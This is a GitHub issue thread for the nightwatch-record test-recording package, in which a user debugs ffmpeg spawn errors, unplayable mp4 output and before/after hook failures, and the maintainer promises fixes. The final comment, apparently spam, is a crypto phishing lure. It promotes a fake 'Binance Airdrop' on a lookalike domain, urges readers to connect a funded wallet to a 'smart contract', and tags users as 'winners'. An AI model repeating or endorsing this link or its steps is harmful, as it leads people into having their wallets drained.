### ISSUE TITLE
"Error: spawn ffmpeg ENOENT" 

### ISSUE THREAD

**Issue by aamorozov** [imarenco/nightwatch-record#2]
Added all pre-sets specified in the readme, but still getting the following err(with verbose output):

```
INFO Request: POST /wd/hub/session
 - data:  {"desiredCapabilities":{"browserName":"chrome","javascriptEnabled":true,"acceptSslCerts":true,"platform":"ANY","name":"urlIterationTestSuite"}}
 - headers:  {"Content-Type":"application/json; charset=utf-8","Content-Length":143}
 ✖ Error: spawn ffmpeg ENOENT
    at _errnoException (util.js:1019:11)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:192:19)
    at onErrorNT (internal/child_process.js:374:16)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)
    at process._tickCallback (internal/process/next_tick.js:180:9)
WARN      ✖ Error: spawn ffmpeg ENOENT
INFO FINISHED
LOG     → Completed command end (3 ms)
INFO FINISHED
LOG     → Completed command end (2 ms)

FAILED:  1 errors (20ms)

 _________________________________________________

 TEST FAILURE: 1 error during execution,  0 assertions failed, 0 passed. (256ms)

 ✖ tests_part_3/urlIteration

   - urlIteration (20ms)



Error retrieving a new session from the selenium server
INFO Selenium process finished.
```

**Comment by aamorozov** [comment]
@imarenco 

Got it working, but currently experiencing 2(technically 3) issues: 
1. At the end of each test run the error is thrown, although the video is created: 
```
INFO Selenium process finished.
 ✖ TypeError: Cannot read property 'replace' of null
    at Process.ChildProcess._handle.onexit (internal/child_process.js:200:12)
WARN      ✖ TypeError: Cannot read property 'replace' of null
```
2. The video is created in **mp4** format as expected, but QuickTime player cannot open it. When exporting it in itunes it just showing me the green screen.
3. It works with `beforeEach` and `afterEach` hooks only. `before`, `after` are throwing an error upon starting the test suite: 
```
There was an error while starting the test runner:

TypeError: Cannot read property 'test_settings' of undefined
    at Object.start (/nightwatch_demo/node_modules/nightwatch-record/index.js:31:40)
    at Object.before (/nightwatch_demo/src/nightwatch.globals.js:33:34)
```

Sometimes the process is not exiting correctly and it hangs on "FINISHED", I guess there should be a better way to handle test failures especially in large test suites. I'll see if I'm able to improve it anyway in fork. Thanks for putting this together!

**Comment by imarenco** [comment]
Hello @aamorozov, I will work to fix it, and update version.

**Comment by aamorozov** [comment]
@imarenco Thank you for quick response! I was actually able to see the video in VLC. It appeared to be an issue with `-pix_fmt` for the video to be compatible with qt. As for other issues they persist for now, will try debugging over a weekend. I'm running it on **macOS sierra** btw

**Comment by MatMarrr** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @shisukeUrahara, @Sheepsody, @noghartt, @inanctech, @pavelivanov, @jamesbraun12, @abhisheksisodia
